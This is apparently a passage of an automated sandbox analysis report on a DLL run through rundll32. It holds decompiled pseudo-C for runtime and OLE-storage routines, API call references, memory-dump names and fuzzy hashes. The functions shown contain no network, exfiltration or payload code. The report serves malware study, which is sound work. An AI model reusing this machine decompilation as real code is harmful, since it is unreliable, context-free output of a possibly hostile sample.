                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133B1
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133CD
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133E4
                                                                                                              • Part of subcall function 100193FB: __lock.LIBCMT ref: 10019413
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                                                            • String ID: E
                                                                                                            • API String ID: 4106114094-3568589458
                                                                                                            • Opcode ID: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
                                                                                                            • Instruction ID: 8c17dd76723e682d1ec04a20f3335422bd29dcdf082c608cde21ea215b529c0d
                                                                                                            • Opcode Fuzzy Hash: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
                                                                                                            • Instruction Fuzzy Hash: 90716CB5E00219BFEB55DEE8CC81B9EB7B5EB44324F14C1A9E514EB281D774EA808B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E1001843D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				intOrPtr _t42;
                                                                                                            				void* _t43;
                                                                                                            				short* _t45;
                                                                                                            				int _t58;
                                                                                                            				int _t62;
                                                                                                            				long _t65;
                                                                                                            				int _t67;
                                                                                                            				void* _t69;
                                                                                                            				short* _t77;
                                                                                                            				short* _t78;
                                                                                                            				int _t79;
                                                                                                            				short* _t83;
                                                                                                            				short* _t84;
                                                                                                            				void* _t85;
                                                                                                            				short* _t86;
                                                                                                            				void* _t91;
                                                                                                            
                                                                                                            				_t69 = __ecx;
                                                                                                            				_push(0x1c);
                                                                                                            				_push(0x10042730);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				_t83 = 0;
                                                                                                            				_t91 =  *0x1004f740 - _t83; // 0x1
                                                                                                            				if(_t91 == 0) {
                                                                                                            					if(GetStringTypeW(1, 0x10042704, 1, _t85 - 0x1c) == 0) {
                                                                                                            						_t65 = GetLastError();
                                                                                                            						__eflags = _t65 - 0x78;
                                                                                                            						if(_t65 == 0x78) {
                                                                                                            							 *0x1004f740 = 2;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						 *0x1004f740 = 1;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t42 =  *0x1004f740; // 0x1
                                                                                                            				if(_t42 == 2 || _t42 == _t83) {
                                                                                                            					_t67 =  *(_t85 + 0x1c);
                                                                                                            					__eflags = _t67 - _t83;
                                                                                                            					if(_t67 == _t83) {
                                                                                                            						_t67 =  *0x1004f724; // 0x0
                                                                                                            					}
                                                                                                            					_t77 =  *(_t85 + 0x18);
                                                                                                            					__eflags = _t77;
                                                                                                            					if(_t77 == 0) {
                                                                                                            						_t77 =  *0x1004f734; // 0x0
                                                                                                            					}
                                                                                                            					_t43 = E1001A444(_t67, _t67);
                                                                                                            					__eflags = _t43 - 0xffffffff;
                                                                                                            					if(_t43 != 0xffffffff) {
                                                                                                            						__eflags = _t43 - _t77;
                                                                                                            						if(__eflags == 0) {
                                                                                                            							L29:
                                                                                                            							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
                                                                                                            							__eflags = _t83;
                                                                                                            							if(__eflags != 0) {
                                                                                                            								_push(_t83);
                                                                                                            								E100107C8(_t67, _t78, _t83, __eflags);
                                                                                                            							}
                                                                                                            							_t45 = _t78;
                                                                                                            							goto L32;
                                                                                                            						}
                                                                                                            						_push(0);
                                                                                                            						_push(0);
                                                                                                            						_push(_t85 + 0x10);
                                                                                                            						_push( *(_t85 + 0xc));
                                                                                                            						_push(_t43);
                                                                                                            						_push(_t77);
                                                                                                            						_t83 = E1001A487(_t67, _t77, _t83, __eflags);
                                                                                                            						__eflags = _t83;
                                                                                                            						if(_t83 == 0) {
                                                                                                            							goto L25;
                                                                                                            						}
                                                                                                            						 *(_t85 + 0xc) = _t83;
                                                                                                            						goto L29;
                                                                                                            					} else {
                                                                                                            						goto L25;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					if(_t42 != 1) {
                                                                                                            						L25:
                                                                                                            						_t45 = 0;
                                                                                                            						L32:
                                                                                                            						return E1001254F(_t45);
                                                                                                            					}
                                                                                                            					 *(_t85 - 0x24) = _t83;
                                                                                                            					 *(_t85 - 0x20) = _t83;
                                                                                                            					if( *(_t85 + 0x18) == _t83) {
                                                                                                            						_t62 =  *0x1004f734; // 0x0
                                                                                                            						 *(_t85 + 0x18) = _t62;
                                                                                                            					}
                                                                                                            					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
                                                                                                            					 *(_t85 - 0x28) = _t79;
                                                                                                            					if(_t79 == 0) {
                                                                                                            						goto L25;
                                                                                                            					} else {
                                                                                                            						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                                                                            						_t68 = _t79 + _t79;
                                                                                                            						E10010B20(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
                                                                                                            						 *(_t85 - 0x18) = _t86;
                                                                                                            						_t84 = _t86;
                                                                                                            						 *(_t85 - 0x2c) = _t84;
                                                                                                            						E10011C50(_t84, 0, _t79 + _t79);
                                                                                                            						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
                                                                                                            						_t99 = _t84;
                                                                                                            						if(_t84 != 0) {
                                                                                                            							L15:
                                                                                                            							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
                                                                                                            							if(_t58 != 0) {
                                                                                                            								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
                                                                                                            							}
                                                                                                            							_t102 =  *(_t85 - 0x20);
                                                                                                            							if( *(_t85 - 0x20) != 0) {
                                                                                                            								_push(_t84);
                                                                                                            								E100107C8(_t68, _t79, _t84, _t102);
                                                                                                            							}
                                                                                                            							_t45 =  *(_t85 - 0x24);
                                                                                                            							goto L32;
                                                                                                            						} else {
                                                                                                            							_push(_t79);
                                                                                                            							_push(2);
                                                                                                            							_t84 = E1001382A(_t68, _t79, _t84, _t99);
                                                                                                            							if(_t84 == 0) {
                                                                                                            								goto L25;
                                                                                                            							}
                                                                                                            							 *(_t85 - 0x20) = 1;
                                                                                                            							goto L15;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}




















                                                                                                            APIs
                                                                                                            • GetStringTypeW.KERNEL32(00000001,10042704,00000001,?,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 10018461
                                                                                                            • GetLastError.KERNEL32 ref: 10018473
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 100184D5
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,00000000,10012C1E,?,00000000), ref: 10018553
                                                                                                            • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 10018565
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 3581945363-4125583295
                                                                                                            • Opcode ID: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
                                                                                                            • Instruction ID: 357f909d61fdf3067703904fdff93fde9d84214a81f0f6dffe892fe1b28005b1
                                                                                                            • Opcode Fuzzy Hash: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
                                                                                                            • Instruction Fuzzy Hash: D2418071900629ABEB12CF60CC85A9E3BA6FF497A0F114108F810EE191D735DF91DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 71%
                                                                                                            			E1000B89E(intOrPtr __ecx) {
                                                                                                            				void* _t115;
                                                                                                            				intOrPtr _t119;
                                                                                                            				intOrPtr* _t120;
                                                                                                            				void* _t121;
                                                                                                            				intOrPtr* _t122;
                                                                                                            				intOrPtr* _t124;
                                                                                                            				intOrPtr* _t126;
                                                                                                            				void _t128;
                                                                                                            				intOrPtr* _t130;
                                                                                                            				long _t133;
                                                                                                            				void* _t134;
                                                                                                            				void* _t135;
                                                                                                            				void* _t136;
                                                                                                            				void _t138;
                                                                                                            				void _t140;
                                                                                                            				void* _t142;
                                                                                                            				void* _t143;
                                                                                                            				void* _t146;
                                                                                                            				void* _t147;
                                                                                                            				void _t148;
                                                                                                            				void* _t150;
                                                                                                            				intOrPtr* _t152;
                                                                                                            				void* _t153;
                                                                                                            				void _t157;
                                                                                                            				void* _t158;
                                                                                                            				void _t160;
                                                                                                            				intOrPtr* _t162;
                                                                                                            				void* _t167;
                                                                                                            				intOrPtr* _t169;
                                                                                                            				intOrPtr* _t171;
                                                                                                            				intOrPtr* _t173;
                                                                                                            				void* _t174;
                                                                                                            				intOrPtr* _t176;
                                                                                                            				intOrPtr _t187;
                                                                                                            				intOrPtr* _t207;
                                                                                                            				void* _t211;
                                                                                                            				void* _t226;
                                                                                                            				void* _t227;
                                                                                                            				void* _t228;
                                                                                                            
                                                                                                            				E10011BF0(0x1003aeb1, _t228);
                                                                                                            				_t176 = __ecx + 0x4c;
                                                                                                            				 *((intOrPtr*)(_t228 - 0x20)) = __ecx;
                                                                                                            				_t115 = E1000A2B0(__ecx,  *((intOrPtr*)(_t228 + 8)), 0, 3, 0x10043068, _t176,  *(_t228 + 0x14));
                                                                                                            				 *(_t228 + 0x14) = _t115;
                                                                                                            				if(_t115 < 0) {
                                                                                                            					L51:
                                                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t228 - 0xc));
                                                                                                            					return _t115;
                                                                                                            				}
                                                                                                            				 *(_t228 - 0x10) = 0;
                                                                                                            				 *(_t228 - 0x14) = 0;
                                                                                                            				 *((intOrPtr*)(_t228 + 8)) = 0;
                                                                                                            				E1000A4B6(__ecx, __ecx + 0x3c);
                                                                                                            				_t119 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0xc0))();
                                                                                                            				 *((intOrPtr*)(_t228 - 0x24)) = _t119;
                                                                                                            				if(_t119 != 0) {
                                                                                                            					L4:
                                                                                                            					_t226 =  *(_t228 + 0xc);
                                                                                                            					if(_t226 == 0) {
                                                                                                            						__eflags =  *(_t228 + 0x10);
                                                                                                            						if( *(_t228 + 0x10) != 0) {
                                                                                                            							L15:
                                                                                                            							_t120 =  *_t176;
                                                                                                            							_t211 = _t228 - 0x14;
                                                                                                            							_t121 =  *((intOrPtr*)( *_t120))(_t120, 0x100430e8, _t211);
                                                                                                            							__eflags = _t121;
                                                                                                            							if(_t121 < 0) {
                                                                                                            								L42:
                                                                                                            								if( *(_t228 + 0x14) >= 0) {
                                                                                                            									L45:
                                                                                                            									_t122 =  *((intOrPtr*)(_t228 + 8));
                                                                                                            									if(_t122 != 0) {
                                                                                                            										 *((intOrPtr*)( *_t122 + 8))(_t122);
                                                                                                            									}
                                                                                                            									if( *((intOrPtr*)(_t228 - 0x24)) != 0 &&  *(_t228 + 0x14) >= 0) {
                                                                                                            										 *(_t228 + 0x14) = 1;
                                                                                                            									}
                                                                                                            									_t115 =  *(_t228 + 0x14);
                                                                                                            									goto L51;
                                                                                                            								}
                                                                                                            								L43:
                                                                                                            								_t124 =  *_t176;
                                                                                                            								if(_t124 != 0) {
                                                                                                            									 *((intOrPtr*)( *_t124 + 0x18))(_t124, 1);
                                                                                                            									_t126 =  *_t176;
                                                                                                            									 *((intOrPtr*)( *_t126 + 8))(_t126);
                                                                                                            									 *_t176 = 0;
                                                                                                            								}
                                                                                                            								goto L45;
                                                                                                            							}
                                                                                                            							__eflags = _t226;
                                                                                                            							if(_t226 != 0) {
                                                                                                            								__eflags =  *(_t228 + 0x10);
                                                                                                            								if( *(_t228 + 0x10) == 0) {
                                                                                                            									 *(_t228 + 0x14) = 0x8000ffff;
                                                                                                            									L36:
                                                                                                            									_t128 =  *(_t228 - 0x14);
                                                                                                            									L37:
                                                                                                            									 *((intOrPtr*)( *_t128 + 8))(_t128);
                                                                                                            									L38:
                                                                                                            									if( *(_t228 + 0x14) < 0) {
                                                                                                            										goto L43;
                                                                                                            									}
                                                                                                            									if( *((intOrPtr*)(_t228 - 0x24)) == 0) {
                                                                                                            										_t187 =  *((intOrPtr*)(_t228 - 0x20));
                                                                                                            										if(( *(_t187 + 0x6e) & 0x00000002) == 0) {
                                                                                                            											_t130 =  *_t176;
                                                                                                            											 *(_t228 + 0x14) =  *((intOrPtr*)( *_t130 + 0xc))(_t130, _t187 + 0xc4);
                                                                                                            										}
                                                                                                            									}
                                                                                                            									goto L42;
                                                                                                            								}
                                                                                                            								_t133 =  *((intOrPtr*)( *_t226 + 0x30))();
                                                                                                            								__eflags = _t211;
                                                                                                            								 *(_t228 - 0x2c) = _t133;
                                                                                                            								if(__eflags > 0) {
                                                                                                            									L29:
                                                                                                            									 *(_t228 + 0x14) = 0x8007000e;
                                                                                                            									 *(_t228 + 0x10) = 0;
                                                                                                            									L30:
                                                                                                            									__eflags =  *(_t228 + 0x10);
                                                                                                            									 *(_t228 - 0x1c) = 0;
                                                                                                            									if( *(_t228 + 0x10) == 0) {
                                                                                                            										goto L36;
                                                                                                            									}
                                                                                                            									_t134 = _t228 - 0x1c;
                                                                                                            									__imp__CreateILockBytesOnHGlobal( *(_t228 + 0x10), 1, _t134);
                                                                                                            									__eflags = _t134;
                                                                                                            									 *(_t228 + 0x14) = _t134;
                                                                                                            									if(_t134 < 0) {
                                                                                                            										goto L36;
                                                                                                            									}
                                                                                                            									_t135 = _t228 - 0x18;
                                                                                                            									 *(_t228 - 0x18) = 0;
                                                                                                            									__imp__StgOpenStorageOnILockBytes( *(_t228 - 0x1c), 0, 0x12, 0, 0, _t135);
                                                                                                            									__eflags = _t135;
                                                                                                            									 *(_t228 + 0x14) = _t135;
                                                                                                            									if(_t135 >= 0) {
                                                                                                            										_t138 =  *(_t228 - 0x14);
                                                                                                            										 *(_t228 + 0x14) =  *((intOrPtr*)( *_t138 + 0x18))(_t138,  *(_t228 - 0x18));
                                                                                                            										_t140 =  *(_t228 - 0x18);
                                                                                                            										 *((intOrPtr*)( *_t140 + 8))(_t140);
                                                                                                            									}
                                                                                                            									_t136 =  *(_t228 - 0x1c);
                                                                                                            									L21:
                                                                                                            									 *((intOrPtr*)( *_t136 + 8))(_t136);
                                                                                                            									goto L36;
                                                                                                            								}
                                                                                                            								if(__eflags < 0) {
                                                                                                            									L26:
                                                                                                            									_t142 = GlobalAlloc(0, _t133);
                                                                                                            									__eflags = _t142;
                                                                                                            									 *(_t228 + 0x10) = _t142;
                                                                                                            									if(_t142 == 0) {
                                                                                                            										goto L29;
                                                                                                            									}
                                                                                                            									_t143 = GlobalLock(_t142);
                                                                                                            									__eflags = _t143;
                                                                                                            									if(_t143 == 0) {
                                                                                                            										goto L29;
                                                                                                            									}
                                                                                                            									 *((intOrPtr*)( *_t226 + 0x34))(_t143,  *(_t228 - 0x2c));
                                                                                                            									GlobalUnlock( *(_t228 + 0x10));
                                                                                                            									goto L30;
                                                                                                            								}
                                                                                                            								__eflags = _t133 - 0xffffffff;
                                                                                                            								if(_t133 >= 0xffffffff) {
                                                                                                            									goto L29;
                                                                                                            								}
                                                                                                            								goto L26;
                                                                                                            							}
                                                                                                            							_t146 = _t228 + 0xc;
                                                                                                            							 *(_t228 + 0xc) = 0;
                                                                                                            							__imp__CreateILockBytesOnHGlobal(0, 1, _t146);
                                                                                                            							__eflags = _t146;
                                                                                                            							 *(_t228 + 0x14) = _t146;
                                                                                                            							if(_t146 < 0) {
                                                                                                            								goto L36;
                                                                                                            							}
                                                                                                            							_t147 = _t228 + 0x10;
                                                                                                            							 *(_t228 + 0x10) = 0;
                                                                                                            							__imp__StgCreateDocfileOnILockBytes( *(_t228 + 0xc), 0x1012, 0, _t147);
                                                                                                            							__eflags = _t147;
                                                                                                            							 *(_t228 + 0x14) = _t147;
                                                                                                            							if(_t147 >= 0) {
                                                                                                            								_t148 =  *(_t228 - 0x14);
                                                                                                            								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t148 + 0x14))(_t148,  *(_t228 + 0x10));
                                                                                                            								_t150 =  *(_t228 + 0x10);
                                                                                                            								 *((intOrPtr*)( *_t150 + 8))(_t150);
                                                                                                            							}
                                                                                                            							_t136 =  *(_t228 + 0xc);
                                                                                                            							goto L21;
                                                                                                            						}
                                                                                                            						L10:
                                                                                                            						_t152 =  *_t176;
                                                                                                            						_t214 = _t228 - 0x10;
                                                                                                            						_t153 =  *((intOrPtr*)( *_t152))(_t152, 0x10043188, _t228 - 0x10);
                                                                                                            						__eflags = _t153;
                                                                                                            						if(_t153 < 0) {
                                                                                                            							goto L15;
                                                                                                            						} else {
                                                                                                            							__eflags = _t226;
                                                                                                            							if(__eflags != 0) {
                                                                                                            								E1002A986(_t228 - 0x74, _t214, __eflags);
                                                                                                            								 *(_t228 - 4) = 0;
                                                                                                            								E1001D6AF(_t228 - 0x2c, _t228 - 0x74);
                                                                                                            								_t157 =  *(_t228 - 0x10);
                                                                                                            								_t158 =  *((intOrPtr*)( *_t157 + 0x14))(_t157, _t228 - 0x2c, _t226, 1, 0x1000, 0);
                                                                                                            								_t46 = _t228 - 4;
                                                                                                            								 *_t46 =  *(_t228 - 4) | 0xffffffff;
                                                                                                            								__eflags =  *_t46;
                                                                                                            								 *(_t228 + 0x14) = _t158;
                                                                                                            								E1002A941(_t228 - 0x74, _t228 - 0x2c);
                                                                                                            							} else {
                                                                                                            								_t160 =  *(_t228 - 0x10);
                                                                                                            								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t160 + 0x20))(_t160);
                                                                                                            							}
                                                                                                            							_t128 =  *(_t228 - 0x10);
                                                                                                            							goto L37;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if( *(_t228 + 0x10) != 0) {
                                                                                                            						goto L15;
                                                                                                            					}
                                                                                                            					_t162 =  *_t176;
                                                                                                            					_push(_t228 + 8);
                                                                                                            					_push(0x10043198);
                                                                                                            					_push(_t162);
                                                                                                            					if( *((intOrPtr*)( *_t162))() < 0) {
                                                                                                            						goto L10;
                                                                                                            					}
                                                                                                            					_push(0);
                                                                                                            					_push(0);
                                                                                                            					_push(0);
                                                                                                            					_push(3);
                                                                                                            					if( *((intOrPtr*)( *_t226 + 0x50))() == 0) {
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						 *(_t228 + 0x10) = 0;
                                                                                                            						_t167 =  *((intOrPtr*)( *_t226 + 0x50))(0, 0xffffffff, _t228 + 0x10, _t228 + 0xc);
                                                                                                            						_t207 =  *((intOrPtr*)(_t228 + 8));
                                                                                                            						 *(_t228 + 0x14) =  *((intOrPtr*)( *_t207 + 0x14))(_t207,  *(_t228 + 0x10), _t167);
                                                                                                            						_t169 =  *((intOrPtr*)(_t228 + 8));
                                                                                                            						 *((intOrPtr*)( *_t169 + 8))(_t169);
                                                                                                            						 *((intOrPtr*)(_t228 + 8)) = 0;
                                                                                                            						goto L38;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t171 =  *_t176;
                                                                                                            				_t227 = __ecx + 0x6c;
                                                                                                            				 *((intOrPtr*)( *_t171 + 0x58))(_t171, 1, _t227);
                                                                                                            				if(( *(_t227 + 2) & 0x00000002) == 0) {
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            				_t173 =  *_t176;
                                                                                                            				_t174 =  *((intOrPtr*)( *_t173 + 0xc))(_t173,  *((intOrPtr*)(_t228 - 0x20)) + 0xc4);
                                                                                                            				 *(_t228 + 0x14) = _t174;
                                                                                                            				if(_t174 < 0) {
                                                                                                            					goto L43;
                                                                                                            				}
                                                                                                            				goto L4;
                                                                                                            			}

                                                                                                            0x1000bb39
                                                                                                            0x1000bb3c
                                                                                                            0x1000bb3f
                                                                                                            0x1000bb42
                                                                                                            0x1000bb45
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000bb4a
                                                                                                            0x1000bb4c
                                                                                                            0x1000bb53
                                                                                                            0x1000bb55
                                                                                                            0x1000bb64
                                                                                                            0x1000bb64
                                                                                                            0x1000bb53
                                                                                                            0x00000000
                                                                                                            0x1000bb4a
                                                                                                            0x1000ba8d
                                                                                                            0x1000ba90
                                                                                                            0x1000ba92
                                                                                                            0x1000ba95
                                                                                                            0x1000bace
                                                                                                            0x1000bace
                                                                                                            0x1000bad5
                                                                                                            0x1000bad8
                                                                                                            0x1000bad8
                                                                                                            0x1000badb
                                                                                                            0x1000bade
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000bae0
                                                                                                            0x1000bae9
                                                                                                            0x1000baef
                                                                                                            0x1000baf1
                                                                                                            0x1000baf4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000baf6
                                                                                                            0x1000bb02
                                                                                                            0x1000bb05
                                                                                                            0x1000bb0b
                                                                                                            0x1000bb0d
                                                                                                            0x1000bb10
                                                                                                            0x1000bb12
                                                                                                            0x1000bb1e
                                                                                                            0x1000bb21
                                                                                                            0x1000bb27
                                                                                                            0x1000bb27
                                                                                                            0x1000bb2a
                                                                                                            0x1000ba75
                                                                                                            0x1000ba78
                                                                                                            0x00000000
                                                                                                            0x1000ba78
                                                                                                            0x1000ba97
                                                                                                            0x1000ba9e
                                                                                                            0x1000baa0
                                                                                                            0x1000baa6
                                                                                                            0x1000baa8
                                                                                                            0x1000baab
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000baae
                                                                                                            0x1000bab4
                                                                                                            0x1000bab6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000bac0
                                                                                                            0x1000bac6
                                                                                                            0x00000000
                                                                                                            0x1000bac6
                                                                                                            0x1000ba99
                                                                                                            0x1000ba9c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ba9c
                                                                                                            0x1000ba22
                                                                                                            0x1000ba29
                                                                                                            0x1000ba2c
                                                                                                            0x1000ba32
                                                                                                            0x1000ba34
                                                                                                            0x1000ba37
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ba3d
                                                                                                            0x1000ba4a
                                                                                                            0x1000ba4d
                                                                                                            0x1000ba53
                                                                                                            0x1000ba55
                                                                                                            0x1000ba58
                                                                                                            0x1000ba5a
                                                                                                            0x1000ba66
                                                                                                            0x1000ba69
                                                                                                            0x1000ba6f
                                                                                                            0x1000ba6f
                                                                                                            0x1000ba72
                                                                                                            0x00000000
                                                                                                            0x1000ba72
                                                                                                            0x1000b99c
                                                                                                            0x1000b99c
                                                                                                            0x1000b9a0
                                                                                                            0x1000b9aa
                                                                                                            0x1000b9ac
                                                                                                            0x1000b9ae
                                                                                                            0x00000000
                                                                                                            0x1000b9b0
                                                                                                            0x1000b9b0
                                                                                                            0x1000b9b2
                                                                                                            0x1000b9ce
                                                                                                            0x1000b9da
                                                                                                            0x1000b9dd
                                                                                                            0x1000b9e2
                                                                                                            0x1000b9ec
                                                                                                            0x1000b9ef
                                                                                                            0x1000b9ef
                                                                                                            0x1000b9ef
                                                                                                            0x1000b9f6
                                                                                                            0x1000b9f9
                                                                                                            0x1000b9b4
                                                                                                            0x1000b9b4
                                                                                                            0x1000b9bd
                                                                                                            0x1000b9bd
                                                                                                            0x1000b9fe
                                                                                                            0x00000000
                                                                                                            0x1000b9fe
                                                                                                            0x1000b9ae
                                                                                                            0x1000b937
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000b93d
                                                                                                            0x1000b944
                                                                                                            0x1000b945
                                                                                                            0x1000b94a
                                                                                                            0x1000b94f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000b953
                                                                                                            0x1000b954
                                                                                                            0x1000b955
                                                                                                            0x1000b956
                                                                                                            0x1000b95f
                                                                                                            0x00000000
                                                                                                            0x1000b961
                                                                                                            0x1000b970
                                                                                                            0x1000b973
                                                                                                            0x1000b976
                                                                                                            0x1000b983
                                                                                                            0x1000b986
                                                                                                            0x1000b98c
                                                                                                            0x1000b98f
                                                                                                            0x00000000
                                                                                                            0x1000b98f
                                                                                                            0x1000b95f
                                                                                                            0x1000b8fc
                                                                                                            0x1000b900
                                                                                                            0x1000b907
                                                                                                            0x1000b90e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000b913
                                                                                                            0x1000b91f
                                                                                                            0x1000b924
                                                                                                            0x1000b927
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1000B8A3
                                                                                                              • Part of subcall function 1000A2B0: CoGetClassObject.OLE32(?,?,00000000,100430A8,?), ref: 1000A2D0
                                                                                                              • Part of subcall function 1002A986: __EH_prolog.LIBCMT ref: 1002A98B
                                                                                                              • Part of subcall function 1002A941: __EH_prolog.LIBCMT ref: 1002A946
                                                                                                            • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 1000BA2C
                                                                                                            • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 1000BA4D
                                                                                                            • GlobalAlloc.KERNEL32(00000000,00000000), ref: 1000BAA0
                                                                                                            • GlobalLock.KERNEL32 ref: 1000BAAE
                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 1000BAC6
                                                                                                            • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 1000BAE9
                                                                                                            • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 1000BB05
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 645133905-0
                                                                                                            • Opcode ID: 185fddf691f165cf246ba28c1c06a3726dabc5333d542278f897f997fcb1b7b0
                                                                                                            • Instruction ID: 4fa0019427ba4cc32ee59eeb07c1e68fe65e84f71fb64a57669587eeb3e16f8a
                                                                                                            • Opcode Fuzzy Hash: 185fddf691f165cf246ba28c1c06a3726dabc5333d542278f897f997fcb1b7b0
                                                                                                            • Instruction Fuzzy Hash: 73C16A70A0064AEFDB11CF64C888DAEBBB9FF89780B204559F941EB265C771DD41CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 87%
                                                                                                            			E10022499(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
                                                                                                            				int _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				int _v16;
                                                                                                            				int _v20;
                                                                                                            				struct tagRECT _v36;
